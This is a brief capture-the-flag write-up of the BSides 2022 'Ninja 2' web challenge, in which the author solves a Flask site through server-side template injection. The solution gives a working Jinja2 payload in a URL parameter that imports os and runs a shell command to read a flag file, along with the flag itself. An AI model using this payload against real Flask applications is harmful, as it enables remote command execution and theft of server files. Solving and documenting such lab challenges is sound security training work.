bsides2022 – Ninja 2

17 October 2022 – Written by Valentin Huber – in ctf, flask, injection, python, and web

Challenge

Part 2 of 3: what do you know?

This challenge was on the same website as Ninja 1.

Solution

[URL]/?adj1={{request.application.__globals__.__builtins__.__import__('os').popen('cat /home/appuser/flag.txt').read()}} returned the flag: flag{datt3bay0!}